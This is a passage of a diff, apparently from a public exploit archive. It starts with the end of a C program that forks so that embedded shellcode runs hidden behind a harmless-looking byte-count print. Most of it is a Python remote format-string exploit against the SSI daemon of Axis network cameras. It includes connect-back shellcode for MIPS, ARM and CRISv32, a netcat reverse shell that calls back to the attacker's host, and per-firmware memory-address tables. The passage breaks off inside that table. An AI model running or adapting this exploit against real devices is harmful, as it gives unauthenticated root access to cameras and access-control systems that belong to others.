$0xAAAAAAAAAAAAAAAA, %rax\n\t" + "mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" + "mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" + "mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" + "mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t" + "call CODE3"); //1st CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> +} + +//|========================== VOID printBytes =========================== +void printBytes() +{ +printf("The CripSlick's code is %d Bytes Long\n", + strlen(CODE3)); //2nd CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> +} + + +//|============================== Int main ================================ +int main () +{ + +// IMPORTANT> replace CODEX the "unsigned char" variable below +// > This needs to be done twice (for string count + code to use) + +int pid = fork(); // fork start + if(pid == 0){ // pid always starts at 0 + + SHELLCODE(); // launch void SHELLCODE + // this is to represent a scenario where you bind to a good program + // you always want your shellcode to run first + + }else if(pid > 0){ // pid will always be greater than 0 after the 1st process + // this argument will always be satisfied + + printBytes(); // launch printBYTES + // pretend that this is the one the victim thinks he is only using + } +return 0; // satisfy int main +system("exit"); // keeps our shellcode a daemon +} + diff --git a/platforms/multiple/remote/40125.py b/platforms/multiple/remote/40125.py new file mode 100755 index 000000000..dbd1bb711 --- /dev/null +++ b/platforms/multiple/remote/40125.py @@ -0,0 +1,1730 @@ +#!/usr/bin/env python2.7 +# +# [SOF] +# +# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon +# Research and development by bashis 2016 +# +# This format string vulnerability has following characteristic: +# - Heap Based (Exploiting string located on the heap) +# - Blind Attack (No output the remote attacker)(*) +# - Remotly exploitable (As anonymous, no credentials needed) +# +# (*) Not so 'Blind' after all, since the needed addresses can be predicted by statistic. +# +# This exploit has following characteristic: +# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x] +# - Modifying LHOST/LPORT in shellcode on the fly +# - Manual exploiting of remote targets +# - Simple HTTPS support +# - Basic Authorization support (not needed for this exploit) +# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode +# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell) +# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root +# - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous (5.2x and 5.4x give shell as root) +# - Multiple FMS exploit techniques +# - "One-Write-Where-And-What" for MIPS and CRISv32 +# Using "Old Style" POP's +# Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call +# Shellcode loaded in memory by sending shellcode URL encoded, that SSI daemon decodes and keeps in memory. +# - "Two-Write-Where-And-What" for ARM +# 1) "Old Style": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address +# 2) "New Style": ARM Arch's have both "Old Style" (>5.50.x) )POPs and "New Style" (<5.40.x) direct parameter access for POP/Write +# [Big differnce in possibilities between "Old Style" and "New Style", pretty interesting actually] +# - Another way to POP with "Old Style", to be able POPing with low as 1 byte (One byte with %1c instead of eight with %8x) +# - Exploit is quite well documented +# +# Anyhow, +# Everything started from this simple remote request: +# +# --- +# $ echo -en "GET /httpDisabled.shtml?&http_user=%p|%p HTTP/1.0\n\n" | netcat 192.168.0.90 80 +# HTTP/1.1 500 Server Error +# Content-Type: text/html; charset=ISO-8859-1 +# +# 500 Server Error +#

500 Server Error

+# The server encountered an internal error and could not complete your request. +# +# --- +# +# Which gave this output in /var/log/messages on the remote device: +# +# --- +# Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10 +# Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data. +# --- +# +# Which resulted into an remote exploit for more than 200 unique Axis Communication MPQT/PACS products +# +# --- +# $ netcat -vvlp 31337 +# listening on [any] 31337 ... +# 192.168.0.90: inverse host lookup failed: Unknown host +# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738 +# id +# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz) +# pwd +# /usr/html +# --- +# +# Some technical notes: +# +# 1. Direct addressing with %$%n is "delayed", and comes in force only after disconnect. +# Old metod with POP's coming into force instantly +# +# 2. Argument "0" will be assigned (after using old POP metod and %n WRITE) the next address on stack after POP's) +# - Would be interesting to investigate why. +# +# 3. Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26 +# Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff +# +# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff +# Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f +# +# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit: +# Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!) +# +# 4. Everything is randomized, except heap. +# +# 5. My initial attempts to use ROP's was not good, as I didn't want to create +# one unique FMS key by testing each single firmware version, and using ROP with FMS +# on heap seems pretty complicated as there is one jump availible, maximum two. +# +# 5.1 Classic GOT write for free() that will jump to shellcode, was the best technique in this case. +# +# 6. Encoded and Decoded shellcode located in .bss section. +# 6.1 FMS excecuted on heap +# +# 7. Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM +# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs, +# so execute shellcode on heap/stack may be impossible. +# 7.2 ARM shellcode and exploit has been verified by setting executable stack flag bit on binaries, +# and re-compile of the image. +# 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute. +# +# 8. This exploit are pretty well documented, more details can be extracted by reading +# the code and comments. +# +# MIPS ssid maps +# 00400000-0040d000 r-xp 00000000 00:01 2272 /bin/ssid +# 0041d000-0041e000 rw-p 0000d000 00:01 2272 /bin/ssid +# 0041e000-00445000 rwxp 00000000 00:00 0 [heap] +# +# ARM ssid maps +# 00008000-00014000 r-xp 00000000 00:01 2055 /bin/ssid +# 0001c000-0001d000 rw-p 0000c000 00:01 2055 /bin/ssid +# 0001d000-00044000 rw-p 00000000 00:00 0 [heap] +# +# Crisv32 ssid maps +# 00080000-0008c000 r-xp 00000000 1f:03 115 /bin/ssid +# 0008c000-0008e000 rw-p 0000a000 1f:03 115 /bin/ssid +# 0008e000-000b6000 rwxp 0008e000 00:00 0 [heap] +# +# General notes: +# +# When the vul daemon process is exploited, and after popping root connect-back shell, +# the main process are usally restarted by respawnd, after the shell have spawned and taken over the parent process, +# when the main process are fully alive again, I can enjoy the shell, and everybody else can +# enjoy of the camera - that should make all of us happy ;) +# During exploiting, logs says almost nothing, only that the main process restarted. +# Note: Not true with ARM Netcat PIPE shell (as the code will vfork() and wait until child exits) +# +# '&http_user=' is the vuln tag, and the FMS will be excecuted when it will try to do vsyslog(), +# after ssid cannot verify the user, free() are the closest function to be called after +# vsyslog(), needed and perfect to use for jumping. +# There is nothing shown for remote user, possible output of FMS are _only_ shown in log/console. +# So we are pretty blind, but due to fixed FMS keys, that doesn't matter for us - it's predictable by statistics. +# +# Quite surprised to see so many different devices and under one major release version, +# that's covered by one "FMS key". The "FMS key" are valid for all minor versions under the major version. +# +# This made me start thinking how brilliant and clever it would be to make an sophisticated door that's using format string as backdoor, +# which generates no FMS output whatsoever to attacker and unlocked by a 'FMS key', instead of using hardcoded login/password. +# +# - No hardcoded login/password that could easily be found in firmware/software files. +# - Extremely hard to find without local access (and find out what to trigger for opening the door) +# - Nobody can not actually prove it is a sophisticated door for sure. "It's just another bug.. sorry! - here is the fixed version." +# (Only to close this door, and open another door, somewhere else, in any binary - and try make it harder to find) +# +# Note: +# I don't say that Axis Communication has made this hidden format string by this purpose. +# I can only believe it was a really stupid mistake from Axis side, after I have seen one screen-dump of the CVS changelog of SSI Daemon, +# and another screen-dump with the change made late 2009, from non-vulnerable to vulnerable, in the affected code of logerr(). +# +# Vulnerable and exploitable products +# +# A1001, A8004-VE, A9188, C3003, F34, F41, F44, M1124, M1124-E, M1125, M1125-E, M1145, M1145-L, M3006, +# M3007, M3026, M3027, M3037, M7010, M7011, M7014, M7016, P1125, P1353, P1354, P1355, P1357, P1364, +# P1365, P1405, P1405-E, P1405-LE, P1425-E, P1425-LE, P1427, P1427-E, P1435, P3214, P3214-V, P3215, +# P3215-V, P3224, P3224-LVE, P3225-LV, P3353, P3354, P3363, P3364, P3364-L, P3365, P3367, P3384, +# P3707-PE, P3904, P3904-R, P3905, P3915-R, P5414-E, P5415-E, P5514, P5514-E, P5515, P5515-E, P5624, +# P5624-E, P5635-E, P7210, P7214, P7216, P7224, P8535, Q1602, Q1604, Q1614, Q1615, Q1635, Q1635-E, +# Q1765-LE, Q1765-LE-PT, Q1775, Q1931-E, Q1931-E-PT, Q1932-E, Q1932-E-PT, Q1941-E, Q2901-E, Q2901-E-PT, +# Q3504, Q3505, Q6000-E, Q6042, Q6042-C, Q6042-E, Q6042-S, Q6044, Q6044-C, Q6044-E, Q6044-S, Q6045, +# Q6045-C, Q6045-E, Q6045-S, Q6114-E, Q6115-E, Q7411, Q7424-R, Q7436, Q8414, Q8414-LVS, Q8631-E, Q8632-E, +# Q8665-E, Q8665-LE, V5914, V5915, M1054, M1103, M1104, M1113, M1114, M2014-E, M3014, M3113, M3114, M3203, +# M3204, M5013, M5014, M7001, P12/M20, P1204, P1214, P1214-E, P1224-E, P1343, P1344, P1346, P1347, P2014-E, +# P3301, P3304, P3343, P3344, P3346, P3346-E, P5512, P5512-E, P5522, P5522-E, P5532, P5532-E, P5534, P5534-E, +# P5544, P8221, P8513, P8514, P8524, Q1755, Q1910, Q1921, Q1922, Q6032, Q6032-C, Q6032-E, Q6034, Q6034-C, +# Q6034-E, Q6035, Q6035-C, Q6035-E, Q7401, Q7404, Q7406, Q7414, Q8721-E, Q8722-E, C, M1004-W, M1011, M1011-W, +# M1013, M1014, M1025, M1031-W, M1033-W, M1034-W, M1143-L, M1144-L, M3004, M3005, M3011, M3024, M3024-L, +# M3025, M3044-V, M3045-V, M3046-V, P1311, P1428-E, P7701, Q3709-PVE, Q3708-PVE, Q6128-E... and more +# +# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt +# +# Firmware versions vulnerable to the SSI FMS exploit +# +# ('V.Vx' == The FMS key used in this exploit) +# +# Firmware Introduced CRISv32 MIPS ARM (no exec heap from >5.20.x) +# 5.00.x 2008 - - no +# 5.01.x 2008 no - no +# 5.02.x 2008 no - - +# 5.05.x 2009 no - - +# 5.06.x 2009 no - - +# 5.07.x 2009 no - no +# 5.08.x 2010 no - - +# 5.09.x 2010 no - - +# 5.10.x 2009 no - - +# 5.11.x 2010 no - - +# 5.12.x 2010 no - - +# 5.15.x 2010 no - - +# 5.16.x 2010 no - - +# 5.20.x 2010-2011 5.2x - 5.2x +# 5.21.x 2011 5.2x - 5.2x +# 5.22.x 2011 5.2x - - +# 5.25.x 2011 5.2x - - +# 5.40.x 2011 5.4x 5.4x 5.4x +# 5.41.x 2012 5.4x - - +# 5.50.x 2013 5.5x 5.5x 5.4x +# 5.51.x 2013 - 5.4x - +# 5.55.x 2013 - 5.5x 5.5x +# 5.60.x 2014 - 5.6x 5.6x +# 5.65.x 2014-2015 - 5.6x - +# 5.70.x 2015 - 5.7x - +# 5.75.x 2015 - 5.7x 5.7x +# 5.80.x 2015 - 5.8x 5.8x +# 5.81.x 2015 - 5.8x - +# 5.85.x 2015 - 5.8x 5.8x +# 5.90.x 2015 - 5.9x - +# 5.95.x 2016 - 5.9x 5.8x +# 6.10.x 2016 - 6.1x - +# 6.15.x 2016 - - 6.1x +# 6.20.x 2016 - 6.2x - +# +# Vendor URL's of still supported and affected products +# +# http://www.axis.com/global/en/products/access-control +# http://www.axis.com/global/en/products/video-encoders +# http://www.axis.com/global/en/products/network-cameras +# http://www.axis.com/global/en/products/audio +# +# Axis Product Security +# +# product-security@axis.com +# http://www.axis.com/global/en/support/product-security +# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt +# http://www.axis.com/global/en/support/faq/FAQ116268 +# +# Timetable +# +# - Research and Development: 06/01/2016 - 01/06/2016 +# - Sent vulnerability details to vendor: 05/06/2016 +# - Vendor responce received: 06/06/2016 +# - Vendor ACK of findings received: 07/06/2016 +# - Vendor sent verification image: 13/06/2016 +# - Confirmed that exploit do not work after vendors correction: 13/06/2016 +# - Vendor informed about their service release(s): 29/06/2016 +# - Sent vendor a copy of the (this) PoC exploit: 29/06/2016 +# - Full Disclosure: 18/07/2016 +# +# Quote of the day: Never say "whoops! :o", always say "Ah, still interesting! :>" +# +# Have a nice day +# /bashis +# +##################################################################################### + +import sys +import string +import socket +import time +import argparse +import urllib, urllib2, httplib +import base64 +import ssl +import re + + +class do_FMS: + +# POP = "%8x" # Old style POP's with 8 bytes per POP + POP = "%1c" # Old style POP's with 1 byte per POP + WRITElln = "%lln" # Write 8 bytes + WRITEn = "%n" # Write 4 bytes + WRITEhn = "%hn" # Write 2 bytes + WRITEhhn = "%hhn" # Write 1 byte + + def __init__(self,targetIP,verbose): + self.targetIP = targetIP + self.verbose = verbose + self.fmscode = "" + + # Mostly used internally in this function + def Add(self, data): + self.fmscode += data + + # 'New Style' Double word (8 bytes) + def AddDirectParameterLLN(self, ADDR): + self.Add('%') + self.Add(str(ADDR)) + self.Add('$lln') + + # 'New Style' Word (4 bytes) + def AddDirectParameterN(self, ADDR): + self.Add('%') + self.Add(str(ADDR)) + self.Add('$n') + + # 'New Style' Half word (2 bytes) + def AddDirectParameterHN(self, ADDR): + self.Add('%') + self.Add(str(ADDR)) + self.Add('$hn') + + # 'New Style' One Byte (1 byte) + def AddDirectParameterHHN(self, ADDR): + self.Add('%') + self.Add(str(ADDR)) + self.Add('$hhn') + + # Addressing + def AddADDR(self, ADDR): + self.Add('%') + self.Add(str(ADDR)) + self.Add('u') + + # 'Old Style' POP + def AddPOP(self, size): + if size != 0: + self.Add(self.POP * size) + + # Normally only one will be sent, multiple is good to quick-check for any FMS + # + # 'Old Style' Double word (8 bytes) + def AddWRITElln(self, size): + self.Add(self.WRITElln * size) + + # 'Old Style' Word (4 bytes) + def AddWRITEn(self, size): + self.Add(self.WRITEn * size) + + # 'Old Style' Half word (2 bytes) + def AddWRITEhn(self, size): + self.Add(self.WRITEhn * size) + + # 'Old Style' One byte (1 byte) + def AddWRITEhhn(self, size): + self.Add(self.WRITEhhn * size) + + # Return the whole FMS string + def FMSbuild(self): + return self.fmscode + +class HTTPconnect: + + def __init__(self, host, proto, verbose, creds, noexploit): + self.host = host + self.proto = proto + self.verbose = verbose + self.credentials = creds + self.noexploit = noexploit + + # Netcat remote connectback shell needs to have raw HTTP connection as we using special characters as '\t','$','`' etc.. + def RAW(self, uri): + # Connect-timeout in seconds + timeout = 5 + socket.setdefaulttimeout(timeout) + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + tmp = self.host.split(':') + HOST = tmp[0] + PORT = int(tmp[1]) + if self.verbose: + print "[Verbose] Sending to:", HOST + print "[Verbose] Port:", PORT + print "[Verbose] URI:",uri + s.connect((HOST, PORT)) + s.send("GET %s HTTP/1.0\r\n\r\n" % uri) + html = (s.recv(4096)) # We really do not care whats coming back +# if html: +# print "[i] Received:",html + s.shutdown(3) + s.close() + return html + + + def Send(self, uri): + + # The SSI daemon are looking for this, and opens a new FD (5), but this does'nt actually + # matter for the functionality of this exploit, only for future references. + headers = { + 'User-Agent' : 'MSIE', + } + + # Connect-timeout in seconds + timeout = 5 + socket.setdefaulttimeout(timeout) + + url = '%s://%s%s' % (self.proto, self.host, uri) + + if self.verbose: + print "[Verbose] Sending:", url + + if self.proto == 'https': + if hasattr(ssl, '_create_unverified_context'): + print "[i] Creating SSL Default Context" + ssl._create_default_https_context = ssl._create_unverified_context + + if self.credentials: + Basic_Auth = self.credentials.split(':') + if self.verbose: + print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1] + try: + pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm() + pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1]) + auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr) + opener = urllib2.build_opener(auth_handler) + urllib2.install_opener(opener) + except Exception as e: + print "[!] Basic Auth Error:",e + sys.exit(1) + + if self.noexploit and not self.verbose: + print "[<] 204 Not Sending!" + html = "Not sending any data" + else: + data = None + req = urllib2.Request(url, data, headers) + rsp = urllib2.urlopen(req) + if rsp: + print "[<] %s OK" % rsp.code + html = rsp.read() + return html + + +class shellcode_db: + + def __init__(self,targetIP,verbose): + self.targetIP = targetIP + self.verbose = verbose + + def sc(self,target): + self.target = target + + +# Connect back shellcode +# +# CRISv32: Written by myself, no shellcode availible out on "The Internet" +# NCSH: My PoC of netcat FIFO / PIPE reverese shell, w/o '-e' option and with $IFS as separators +# MIPSel: Written by Jacob Holcomb (url encoded by me) +# ARM: http://shell-storm.org/shellcode/files/shellcode-754.php +# + # Slightly modified syscall's + MIPSel = string.join([ + #close stdin + "%ff%ff%04%28" #slti a0,zero,-1 + "%a6%0f%02%24" #li v0,4006 + "%4c%f7%f7%03" #syscall 0xdfdfd + #close stdout + "%11%11%04%28" #slti a0,zero,4369 + "%a6%0f%02%24" #li v0,4006 + "%4c%f7%f7%03" #syscall 0xdfdfd + #close stderr + "%fd%ff%0c%24" #li t4,-3 + "%27%20%80%01" #nor a0,t4,zero + "%a6%0f%02%24" #li v0,4006 + "%4c%f7%f7%03" #syscall 0xdfdfd + # socket AF_INET (2) + "%fd%ff%0c%24" #li t4,-3 + "%27%20%80%01" #nor a0,t4,zero + "%27%28%80%01" #nor a1,t4,zero + "%ff%ff%06%28" #slti a2,zero,-1 + "%57%10%02%24" #li v0,4183 + "%4c%f7%f7%03" #syscall 0xdfdfd + # + "%ff%ff%44%30" # andi $a0, $v0, 0xFFFF + # + # dup2 stdout + "%c9%0f%02%24" #li v0,4041 + "%4c%f7%f7%03" #syscall 0xdfdfd + # + # dup2 stderr + "%c9%0f%02%24" #li v0,4041 + "%4c%f7%f7%03" #syscall 0xdfdfd + # + # Port + "PP1PP0%05%3c" + "%01%ff%a5%34" + # + "%01%01%a5%20" #addi a1,a1,257 + "%f8%ff%a5%af" #sw a1,-8(sp) + # + # IP + "IP3IP4%05%3c" + "IP1IP2%a5%34" + # + "%fc%ff%a5%af" #sw a1,-4(sp) + "%f8%ff%a5%23" #addi a1,sp,-8 + "%ef%ff%0c%24" #li t4,-17 + "%27%30%80%01" #nor a2,t4,zero + "%4a%10%02%24" #li v0,4170 + "%4c%f7%f7%03" #syscall 0xdfdfd + # + "%62%69%08%3c" #lui t0,0x6962 + "%2f%2f%08%35" #ori t0,t0,0x2f2f + "%ec%ff%a8%af" #sw t0,-20(sp) + "%73%68%08%3c" #lui t0,0x6873 + "%6e%2f%08%35" #ori t0,t0,0x2f6e + "%f0%ff%a8%af" #sw t0,-16(sp + "%ff%ff%07%28" #slti a3,zero,-1 + "%f4%ff%a7%af" #sw a3,-12(sp) + "%fc%ff%a7%af" #sw a3,-4(sp + "%ec%ff%a4%23" #addi a0,sp,-20 + "%ec%ff%a8%23" #addi t0,sp,-20 + "%f8%ff%a8%af" #sw t0,-8(sp) + "%f8%ff%a5%23" #addi a1,sp,-8 + "%ec%ff%bd%27" #addiu sp,sp,-20 + "%ff%ff%06%28" #slti a2,zero,-1 + "%ab%0f%02%24" #li v0,4011 (execve) + "%4c%f7%f7%03" #syscall 0xdfdfd + ], '') + + # Working netcat shell + # - $PATH will locate 'mkfifo', 'nc' and 'rm' + # - LHOST / LPORT will be changed on the fly later in the code + # - 1) make FIFO, 2) netcat back to attacker with STDIN to /bin/sh, and PIPE STDOUT back to the remote via FIFO, 3) remove FIFO when exiting + # - $IFS = [By default, and we need or as separator] + # $ echo -n "$IFS" | hexdump -C + # 00000000 20 09 0a + # - $PS1 = $ [By default, and we need something to "comment" out our trailing FMS code from /bin/sh -c] + # + # '2>/tmp/s' (STDERR > FIFO) Don't work with $IFS as separator + # + # Working with Apache and Boa +# NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0/tmp/s\"$IFS\"2>/tmp/s;rm$IFS/tmp/s;$PS1" + NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0/tmp/s;rm$IFS/tmp/s;$PS1" + + ARMel = string.join([ + # original: http://shell-storm.org/shellcode/files/shellcode-754.php + # 32-bit instructions, enter thumb mode + "%01%10%8f%e2" # add r1, pc, #1 + "%11%ff%2f%e1" # bx r1 + + # 16-bit thumb instructions follow + # + # socket(2, 1, 0) + "%02%20" #mov r0, #2 + "%01%21" #mov r1, #1 + "%92%1a" #sub r2, r2, r2 + "%0f%02" #lsl r7, r1, #8 + "%19%37" #add r7, r7, #25 + "%01%df" #svc 1 + # + # connect(r0, &addr, 16) + "%06%1c" #mov r6, r0 + "%08%a1" #add r1, pc, #32 + "%10%22" #mov r2, #16 + "%02%37" #add r7, #2 + "%01%df" #svc 1 + # + # dup2(r0, 0/1/2) + "%3f%27" #mov r7, #63 + "%02%21" #mov r1, #2 + # + #lb: + "%30%1c" #mov r0, r6 + "%01%df" #svc 1 + "%01%39" #sub r1, #1 + "%fb%d5" #bpl lb + # + # execve("/bin/sh", ["/bin/sh", 0], 0) + "%05%a0" #add r0, pc, #20 + "%92%1a" #sub r2, r2, r2 + "%05%b4" #push {r0, r2} + "%69%46" #mov r1, sp + "%0b%27" #mov r7, #11 + "%01%df" #svc 1 + # + "%c0%46" # .align 2 (NOP) + "%02%00" # .short 0x2 (struct sockaddr) + "PP1PP0" # .short 0x3412 (port: 0x1234) + "IP1IP2IP3IP4" #.byte 192,168,57,1 (ip: 192.168.57.1) + # .ascii "/bin/sh\0\0" + "%2f%62%69%6e" # /bin + "%2f%73%68%00%00" # /sh\x00\x00 + "%00%00%00%00" + "%c0%46" + ], '') + + + # Connect-back shell for Axis CRISv32 + # Written by mcw noemail eu 2016 + # + CRISv32 = string.join([ + #close(0) + "%7a%86" # clear.d r10 + "%5f%9c%06%00" # movu.w 0x6,r9 + "%3d%e9" # break 13 + #close(1) + "%41%a2" # moveq 1,r10 + "%5f%9c%06%00" # movu.w 0x6,r9 + "%3d%e9" # break 13 + #close(2) + "%42%a2" # moveq 2,r10 + "%5f%9c%06%00" # movu.w 0x6,r9 + "%3d%e9" # break 13 + # + "%10%e1" # addoq 16,sp,acr + "%42%92" # moveq 2,r9 + "%df%9b" # move.w r9,[acr] + "%10%e1" # addoq 16,sp,acr + "%02%f2" # addq 2,acr + #PORT + "%5f%9ePP1PP0" # move.w 0xPP1PP0,r9 # + "%df%9b" # move.w r9,[acr] + "%10%e1" # addoq 16,sp,acr + "%6f%96" # move.d acr,r9 + "%04%92" # addq 4,r9 + #IP + "%6f%feIP1IP2IP3IP4" # move.d IP4IP3IP2IP1,acr + "%e9%fb" # move.d acr,[r9] + # + #socket() + "%42%a2" # moveq 2,r10 + "%41%b2" # moveq 1,r11 + "%7c%86" # clear.d r12 + "%6e%96" # move.d $sp,$r9 + "%e9%af" # move.d $r10,[$r9+] + "%e9%bf" # move.d $r11,[$r9+] + "%e9%cf" # move.d $r12,[$r9+] + "%41%a2" # moveq 1,$r10 + "%6e%b6" # move.d $sp,$r11 + "%5f%9c%66%00" # movu.w 0x66,$r9 + "%3d%e9" # break 13 + # + "%6a%96" # move.d $r10,$r9 + "%0c%e1" # addoq 12,$sp,$acr + "%ef%9b" # move.d $r9,[$acr] + "%0c%e1" # addoq 12,$sp,$acr + "%6e%96" # move.d $sp,$r9 + "%10%92" # addq 16,$r9 + "%6f%aa" # move.d [$acr],$r10 + "%69%b6" # move.d $r9,$r11 + "%50%c2" # moveq 16,$r12 + # + # connect() + "%6e%96" # move.d $sp,$r9 + "%e9%af" # move.d $r10,[$r9+] + "%e9%bf" # move.d $r11,[$r9+] + "%e9%cf" # move.d $r12,[$r9+] + "%43%a2" # moveq 3,$r10 + "%6e%b6" # move.d $sp,$r11 + "%5f%9c%66%00" # movu.w 0x66,$r9 + "%3d%e9" # break 13 + # dup(0) already in socket + #dup(1) + "%6f%aa" # move.d [$acr],$r10 + "%41%b2" # moveq 1,$r11 + "%5f%9c%3f%00" # movu.w 0x3f,$r9 + "%3d%e9" # break 13 + # + #dup(2) + "%6f%aa" # move.d [$acr],$r10 + "%42%b2" # moveq 2,$r11 + "%5f%9c%3f%00" # movu.w 0x3f,$r9 + "%3d%e9" # break 13 + # + #execve("/bin/sh",NULL,NULL) + "%90%e2" # subq 16,$sp + "%6e%96" # move.d $sp,$r9 + "%6e%a6" # move.d $sp,$10 + "%6f%0e%2f%2f%62%69" # move.d 69622f2f,$r0 + "%e9%0b" # move.d $r0,[$r9] + "%04%92" # addq 4,$r9 + "%6f%0e%6e%2f%73%68" # move.d 68732f6e,$r0 + "%e9%0b" # move.d $r0,[$r9] + "%04%92" # addq 4,$r9 + "%79%8a" # clear.d [$r9] + "%04%92" # addq 4,$r9 + "%79%8a" # clear.d [$r9] + "%04%92" # addq 4,$r9 + "%e9%ab" # move.d $r10,[$r9] + "%04%92" # addq 4,$r9 + "%79%8a" # clear.d [$r9] + "%10%e2" # addq 16,$sp + "%6e%f6" # move.d $sp,$acr + "%6e%96" # move.d $sp,$r9 + "%6e%b6" # move.d $sp,$r11 + "%7c%86" # clear.d $r12 + "%4b%92" # moveq 11,$r9 + "%3d%e9" # break 13 + ], '') + + + if self.target == 'MIPSel': + return MIPSel + elif self.target == 'ARMel': + return ARMel + elif self.target == 'CRISv32': + return CRISv32 + elif self.target == 'NCSH1': + return NCSH + elif self.target == 'NCSH2': + return NCSH + else: + print "[!] Unknown shellcode! (%s)" % str(self.target) + sys.exit(1) + + +class FMSdb: + + def __init__(self,targetIP,verbose): + self.targetIP = targetIP + self.verbose = verbose + + def FMSkey(self,target): + self.target = target + + target_db = { + +#----------------------------------------------------------------------- +# All pointing from free() GOT to shellcode on .bss (Except ARM with NCSH) +#----------------------------------------------------------------------- + +# +# Using POP format string, AKA 'Old Style' +# + # MPQT + 'MIPS-5.85.x': [ + 0x41f370, # Adjust to GOT free() address + 0x420900, # .bss shellcode address + 2, # 1st POP's + 2, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.40.3': [ + 0x41e41c, # Adjust to GOT free() address + 0x4208cc, # .bss shellcode address + 7, # 1st POP's + 11, # 2nd POP's + 'ax', # Aligns injected code + 450, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.4x': [ + 0x41e4cc, # Adjust to GOT free() address + 0x42097c, # .bss shellcode address + 7, # 1st POP's + 11, # 2nd POP's + 'ax', # Aligns injected code + 450, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.5x': [ + 0x41d11c, # Adjust to GOT free() address + 0x41f728, # .bss shellcode address + 5, # 1st POP's + 15, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.55x': [ + 0x41d11c, # Adjust to GOT free() address + 0x41f728, # .bss shellcode address + 11, # 1st POP's + 9, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # Shared with MPQT and PACS + 'MIPS-5.6x': [ + 0x41d048, # Adjust to GOT free() address + 0x41f728, # .bss shellcode address + 5, # 1st POP's + 15, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + + ], + + # MPQT + 'MIPS-5.7x': [ + 0x41d04c, # Adjust to GOT free() address + 0x41f718, # .bss shellcode address + 2, # 1st POP's + 14, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.75x': [ + 0x41c498, # Adjust to GOT free() address + 0x41daf0, # .bss shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # Shared with MPQT and PACS + 'MIPS-5.8x': [ + 0x41d0c0, # Adjust to GOT free() address + 0x41e740, # .bss shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.9x': [ + 0x41d0c0, # Adjust to GOT free() address + 0x41e750, # .bss shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-6.1x': [ + 0x41c480, # Adjust to GOT free() address + 0x41dac0, # .bss shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-6.2x': [ + 0x41e578, # Adjust to GOT free() address + 0x41fae0, # .bss shellcode address + 2, # 1st POP's + 2, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-6.20x': [ + 0x41d0c4, # Adjust to GOT free() address + 0x41e700, 